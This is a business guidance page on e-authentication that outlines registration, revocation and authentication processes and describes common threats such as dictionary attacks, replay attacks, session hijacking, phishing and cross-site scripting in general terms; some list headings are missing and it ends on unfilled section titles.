e-Authentication for Business
Is e-Authentication required for my Business?
The Internet has revolutionised the mode of delivery of information and services. Provision of online business functions is now a prerequisite for a company to be competitive. To automate core business processes, businesses have to give their users, including customers, suppliers and employees, access to corporate information and applications anytime/ anywhere.
To prevent unauthorised users from gaining access to protected resources, secure authentication systems are required to ensure that users are who they claim to be.
What are the Processes Involved?
E-authentication is an important element in establishment of trust on electronic transactions. Two major processes are involved:
1. Registration Process
The registration process will normally consist of 2 major components, namely Registration and Revocation.
- to ensure that the claimed identity actually exists;
- to ensure that the applicant is who he/she says to be;
- to ensure that the information associated with the identity are consistent, accurate and recorded; and
- to issue a credential, or record details of an existing credential.
- to withdraw and where necessary replace credentials in case of holder's death, resignation or dismissal, change of name, cessation of trading or other significant change of circumstance;
- to withdraw and replace stolen/compromised credentials;
- to suspend credentials where there is suspicion of compromise, theft or significant change of circumstances; and
- to withdraw credentials at the client's request.
2. Authentication Process
Authentication is the process to identify and to prove the identity of a user/party who attempts to send message or access data. The objective is
- to check that the credential is valid for the transaction in question; and
- to check that the credential presented has not expired, been revoked or withdrawn.
What are the Common Threats?
Broadly speaking, there are three types of attacks in the registration process
the attacker obtains a credential in another person's name, where the subject person can be targeted or untargeted.
- Fictitious Subscriber
the attacker claims the identity of a non-existent person with the goal to creating a subscriber relationship.
- Rogue Registration Entity
an internal abuse of trusted position to create or obtain credentials as a potential subscriber or a non-existent person.
There are also four main sources of threats during the authentication process:
- Eavesdropper / Replay Attack
observer of the run of authentication data (across the network) for later analysis or interception of the messages between the genuine parties. This observer then makes an improper attempt to obtain tokens to pose as the rightful user. This is often used with the replay attack in which a valid data transmission is maliciously or fraudulently repeated or delayed.
- Password Guessing
the most common way a hacker will try to get your password is via a dictionary attack. In a dictionary attack, the attacker takes a dictionary of words and names, and tries each one to see if it is your password. They do this with programs, which can guess hundreds or thousands of words per second.
one who takes over an already authenticated session and then poses him/herself as the genuine subscriber or IT system to learn sensitive information or to input/output invalid information.
Other Sources of Threats
Other than in the registration and authentication processes, some security attacks may also lead to threats in electronic authentication.
- Phishing / Bogus website
the attacker uses fake e-mail messages that appeared to come from the legitimate organization and asks the victim to provide sensitive information such as account id, password, etc) or provides link to a fraudulent website for victim to enter sensitive information.
the attacker exploits the vulnerabilities of computer systems to gain access and steal the information of sensitive personal data, passwords etc for further attacks such as impersonation or take control of accounts.
- Cross site scripting
the hacker installs malicious codes or scripts on a legitimate website such that when the victim visits the site, the malicious scripts will be executed to steal sensitive information or redirect to another fraudulent website with similar look to the legitimate site.
What is e-Authentication Assurance Level?
Examples on Determining the Assurance Level